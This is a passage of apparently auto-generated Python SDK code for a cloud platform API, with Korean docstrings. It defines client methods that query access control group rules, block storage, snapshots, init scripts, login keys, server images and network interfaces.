return self.get_access_control_group_rule_list_with_http_info(get_access_control_group_rule_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_access_control_group_rule_list_with_http_info(get_access_control_group_rule_list_request, **kwargs) # noqa: E501
return data
def get_access_control_group_rule_list_with_http_info(self, get_access_control_group_rule_list_request, **kwargs): # noqa: E501
"""get_access_control_group_rule_list # noqa: E501
ACGRule리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_access_control_group_rule_list_with_http_info(get_access_control_group_rule_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetAccessControlGroupRuleListRequest get_access_control_group_rule_list_request: getAccessControlGroupRuleListRequest (required)
:return: GetAccessControlGroupRuleListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_access_control_group_rule_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_access_control_group_rule_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_access_control_group_rule_list_request' is set
if ('get_access_control_group_rule_list_request' not in params or
params['get_access_control_group_rule_list_request'] is None):
raise ValueError("Missing the required parameter `get_access_control_group_rule_list_request` when calling `get_access_control_group_rule_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_access_control_group_rule_list_request' in params:
body_params = params['get_access_control_group_rule_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getAccessControlGroupRuleList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetAccessControlGroupRuleListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_storage_instance_detail(self, get_block_storage_instance_detail_request, **kwargs): # noqa: E501
"""get_block_storage_instance_detail # noqa: E501
블록스토리지인스턴스상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_instance_detail(get_block_storage_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageInstanceDetailRequest get_block_storage_instance_detail_request: getBlockStorageInstanceDetailRequest (required)
:return: GetBlockStorageInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_storage_instance_detail_with_http_info(get_block_storage_instance_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_block_storage_instance_detail_with_http_info(get_block_storage_instance_detail_request, **kwargs) # noqa: E501
return data
def get_block_storage_instance_detail_with_http_info(self, get_block_storage_instance_detail_request, **kwargs): # noqa: E501
"""get_block_storage_instance_detail # noqa: E501
블록스토리지인스턴스상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_instance_detail_with_http_info(get_block_storage_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageInstanceDetailRequest get_block_storage_instance_detail_request: getBlockStorageInstanceDetailRequest (required)
:return: GetBlockStorageInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_block_storage_instance_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_storage_instance_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_block_storage_instance_detail_request' is set
if ('get_block_storage_instance_detail_request' not in params or
params['get_block_storage_instance_detail_request'] is None):
raise ValueError("Missing the required parameter `get_block_storage_instance_detail_request` when calling `get_block_storage_instance_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_block_storage_instance_detail_request' in params:
body_params = params['get_block_storage_instance_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getBlockStorageInstanceDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetBlockStorageInstanceDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_storage_instance_list(self, get_block_storage_instance_list_request, **kwargs): # noqa: E501
"""get_block_storage_instance_list # noqa: E501
블록스토리지인스턴스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_instance_list(get_block_storage_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageInstanceListRequest get_block_storage_instance_list_request: getBlockStorageInstanceListRequest (required)
:return: GetBlockStorageInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_storage_instance_list_with_http_info(get_block_storage_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_block_storage_instance_list_with_http_info(get_block_storage_instance_list_request, **kwargs) # noqa: E501
return data
def get_block_storage_instance_list_with_http_info(self, get_block_storage_instance_list_request, **kwargs): # noqa: E501
"""get_block_storage_instance_list # noqa: E501
블록스토리지인스턴스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_instance_list_with_http_info(get_block_storage_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageInstanceListRequest get_block_storage_instance_list_request: getBlockStorageInstanceListRequest (required)
:return: GetBlockStorageInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_block_storage_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_storage_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_block_storage_instance_list_request' is set
if ('get_block_storage_instance_list_request' not in params or
params['get_block_storage_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_block_storage_instance_list_request` when calling `get_block_storage_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_block_storage_instance_list_request' in params:
body_params = params['get_block_storage_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getBlockStorageInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetBlockStorageInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_storage_snapshot_instance_detail(self, get_block_storage_snapshot_instance_detail_request, **kwargs): # noqa: E501
"""get_block_storage_snapshot_instance_detail # noqa: E501
블록스토리지스냅샷인스턴스상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_snapshot_instance_detail(get_block_storage_snapshot_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageSnapshotInstanceDetailRequest get_block_storage_snapshot_instance_detail_request: getBlockStorageSnapshotInstanceDetailRequest (required)
:return: GetBlockStorageSnapshotInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_storage_snapshot_instance_detail_with_http_info(get_block_storage_snapshot_instance_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_block_storage_snapshot_instance_detail_with_http_info(get_block_storage_snapshot_instance_detail_request, **kwargs) # noqa: E501
return data
def get_block_storage_snapshot_instance_detail_with_http_info(self, get_block_storage_snapshot_instance_detail_request, **kwargs): # noqa: E501
"""get_block_storage_snapshot_instance_detail # noqa: E501
블록스토리지스냅샷인스턴스상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_snapshot_instance_detail_with_http_info(get_block_storage_snapshot_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageSnapshotInstanceDetailRequest get_block_storage_snapshot_instance_detail_request: getBlockStorageSnapshotInstanceDetailRequest (required)
:return: GetBlockStorageSnapshotInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_block_storage_snapshot_instance_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_storage_snapshot_instance_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_block_storage_snapshot_instance_detail_request' is set
if ('get_block_storage_snapshot_instance_detail_request' not in params or
params['get_block_storage_snapshot_instance_detail_request'] is None):
raise ValueError("Missing the required parameter `get_block_storage_snapshot_instance_detail_request` when calling `get_block_storage_snapshot_instance_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_block_storage_snapshot_instance_detail_request' in params:
body_params = params['get_block_storage_snapshot_instance_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getBlockStorageSnapshotInstanceDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetBlockStorageSnapshotInstanceDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_block_storage_snapshot_instance_list(self, get_block_storage_snapshot_instance_list_request, **kwargs): # noqa: E501
"""get_block_storage_snapshot_instance_list # noqa: E501
블록스토리지스냅샷인스턴스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_snapshot_instance_list(get_block_storage_snapshot_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageSnapshotInstanceListRequest get_block_storage_snapshot_instance_list_request: getBlockStorageSnapshotInstanceListRequest (required)
:return: GetBlockStorageSnapshotInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_block_storage_snapshot_instance_list_with_http_info(get_block_storage_snapshot_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_block_storage_snapshot_instance_list_with_http_info(get_block_storage_snapshot_instance_list_request, **kwargs) # noqa: E501
return data
def get_block_storage_snapshot_instance_list_with_http_info(self, get_block_storage_snapshot_instance_list_request, **kwargs): # noqa: E501
"""get_block_storage_snapshot_instance_list # noqa: E501
블록스토리지스냅샷인스턴스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_block_storage_snapshot_instance_list_with_http_info(get_block_storage_snapshot_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetBlockStorageSnapshotInstanceListRequest get_block_storage_snapshot_instance_list_request: getBlockStorageSnapshotInstanceListRequest (required)
:return: GetBlockStorageSnapshotInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_block_storage_snapshot_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_block_storage_snapshot_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_block_storage_snapshot_instance_list_request' is set
if ('get_block_storage_snapshot_instance_list_request' not in params or
params['get_block_storage_snapshot_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_block_storage_snapshot_instance_list_request` when calling `get_block_storage_snapshot_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_block_storage_snapshot_instance_list_request' in params:
body_params = params['get_block_storage_snapshot_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getBlockStorageSnapshotInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetBlockStorageSnapshotInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_init_script_detail(self, get_init_script_detail_request, **kwargs): # noqa: E501
"""get_init_script_detail # noqa: E501
초기화스크립트상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_init_script_detail(get_init_script_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetInitScriptDetailRequest get_init_script_detail_request: getInitScriptDetailRequest (required)
:return: GetInitScriptDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_init_script_detail_with_http_info(get_init_script_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_init_script_detail_with_http_info(get_init_script_detail_request, **kwargs) # noqa: E501
return data
def get_init_script_detail_with_http_info(self, get_init_script_detail_request, **kwargs): # noqa: E501
"""get_init_script_detail # noqa: E501
초기화스크립트상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_init_script_detail_with_http_info(get_init_script_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetInitScriptDetailRequest get_init_script_detail_request: getInitScriptDetailRequest (required)
:return: GetInitScriptDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_init_script_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_init_script_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_init_script_detail_request' is set
if ('get_init_script_detail_request' not in params or
params['get_init_script_detail_request'] is None):
raise ValueError("Missing the required parameter `get_init_script_detail_request` when calling `get_init_script_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_init_script_detail_request' in params:
body_params = params['get_init_script_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getInitScriptDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetInitScriptDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_init_script_list(self, get_init_script_list_request, **kwargs): # noqa: E501
"""get_init_script_list # noqa: E501
초기화스크립트리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_init_script_list(get_init_script_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetInitScriptListRequest get_init_script_list_request: getInitScriptListRequest (required)
:return: GetInitScriptListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_init_script_list_with_http_info(get_init_script_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_init_script_list_with_http_info(get_init_script_list_request, **kwargs) # noqa: E501
return data
def get_init_script_list_with_http_info(self, get_init_script_list_request, **kwargs): # noqa: E501
"""get_init_script_list # noqa: E501
초기화스크립트리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_init_script_list_with_http_info(get_init_script_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetInitScriptListRequest get_init_script_list_request: getInitScriptListRequest (required)
:return: GetInitScriptListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_init_script_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_init_script_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_init_script_list_request' is set
if ('get_init_script_list_request' not in params or
params['get_init_script_list_request'] is None):
raise ValueError("Missing the required parameter `get_init_script_list_request` when calling `get_init_script_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_init_script_list_request' in params:
body_params = params['get_init_script_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getInitScriptList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetInitScriptListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_login_key_list(self, get_login_key_list_request, **kwargs): # noqa: E501
"""get_login_key_list # noqa: E501
로그인키리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_login_key_list(get_login_key_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetLoginKeyListRequest get_login_key_list_request: getLoginKeyListRequest (required)
:return: GetLoginKeyListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_login_key_list_with_http_info(get_login_key_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_login_key_list_with_http_info(get_login_key_list_request, **kwargs) # noqa: E501
return data
def get_login_key_list_with_http_info(self, get_login_key_list_request, **kwargs): # noqa: E501
"""get_login_key_list # noqa: E501
로그인키리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_login_key_list_with_http_info(get_login_key_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetLoginKeyListRequest get_login_key_list_request: getLoginKeyListRequest (required)
:return: GetLoginKeyListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_login_key_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_login_key_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_login_key_list_request' is set
if ('get_login_key_list_request' not in params or
params['get_login_key_list_request'] is None):
raise ValueError("Missing the required parameter `get_login_key_list_request` when calling `get_login_key_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_login_key_list_request' in params:
body_params = params['get_login_key_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getLoginKeyList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetLoginKeyListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_member_server_image_instance_detail(self, get_member_server_image_instance_detail_request, **kwargs): # noqa: E501
"""get_member_server_image_instance_detail # noqa: E501
회원서버이미지인스턴스상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_member_server_image_instance_detail(get_member_server_image_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetMemberServerImageInstanceDetailRequest get_member_server_image_instance_detail_request: getMemberServerImageInstanceDetailRequest (required)
:return: GetMemberServerImageInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_member_server_image_instance_detail_with_http_info(get_member_server_image_instance_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_member_server_image_instance_detail_with_http_info(get_member_server_image_instance_detail_request, **kwargs) # noqa: E501
return data
def get_member_server_image_instance_detail_with_http_info(self, get_member_server_image_instance_detail_request, **kwargs): # noqa: E501
"""get_member_server_image_instance_detail # noqa: E501
회원서버이미지인스턴스상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_member_server_image_instance_detail_with_http_info(get_member_server_image_instance_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetMemberServerImageInstanceDetailRequest get_member_server_image_instance_detail_request: getMemberServerImageInstanceDetailRequest (required)
:return: GetMemberServerImageInstanceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_member_server_image_instance_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_member_server_image_instance_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_member_server_image_instance_detail_request' is set
if ('get_member_server_image_instance_detail_request' not in params or
params['get_member_server_image_instance_detail_request'] is None):
raise ValueError("Missing the required parameter `get_member_server_image_instance_detail_request` when calling `get_member_server_image_instance_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_member_server_image_instance_detail_request' in params:
body_params = params['get_member_server_image_instance_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getMemberServerImageInstanceDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetMemberServerImageInstanceDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_member_server_image_instance_list(self, get_member_server_image_instance_list_request, **kwargs): # noqa: E501
"""get_member_server_image_instance_list # noqa: E501
회원서버이미지인스턴스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_member_server_image_instance_list(get_member_server_image_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetMemberServerImageInstanceListRequest get_member_server_image_instance_list_request: getMemberServerImageInstanceListRequest (required)
:return: GetMemberServerImageInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_member_server_image_instance_list_with_http_info(get_member_server_image_instance_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_member_server_image_instance_list_with_http_info(get_member_server_image_instance_list_request, **kwargs) # noqa: E501
return data
def get_member_server_image_instance_list_with_http_info(self, get_member_server_image_instance_list_request, **kwargs): # noqa: E501
"""get_member_server_image_instance_list # noqa: E501
회원서버이미지인스턴스리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_member_server_image_instance_list_with_http_info(get_member_server_image_instance_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetMemberServerImageInstanceListRequest get_member_server_image_instance_list_request: getMemberServerImageInstanceListRequest (required)
:return: GetMemberServerImageInstanceListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_member_server_image_instance_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_member_server_image_instance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_member_server_image_instance_list_request' is set
if ('get_member_server_image_instance_list_request' not in params or
params['get_member_server_image_instance_list_request'] is None):
raise ValueError("Missing the required parameter `get_member_server_image_instance_list_request` when calling `get_member_server_image_instance_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_member_server_image_instance_list_request' in params:
body_params = params['get_member_server_image_instance_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getMemberServerImageInstanceList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetMemberServerImageInstanceListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_network_interface_detail(self, get_network_interface_detail_request, **kwargs): # noqa: E501
"""get_network_interface_detail # noqa: E501
네트워크인터페이스상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_network_interface_detail(get_network_interface_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetNetworkInterfaceDetailRequest get_network_interface_detail_request: getNetworkInterfaceDetailRequest (required)
:return: GetNetworkInterfaceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_network_interface_detail_with_http_info(get_network_interface_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_network_interface_detail_with_http_info(get_network_interface_detail_request, **kwargs) # noqa: E501
return data
def get_network_interface_detail_with_http_info(self, get_network_interface_detail_request, **kwargs): # noqa: E501
"""get_network_interface_detail # noqa: E501
네트워크인터페이스상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_network_interface_detail_with_http_info(get_network_interface_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetNetworkInterfaceDetailRequest get_network_interface_detail_request: getNetworkInterfaceDetailRequest (required)
:return: GetNetworkInterfaceDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_network_interface_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
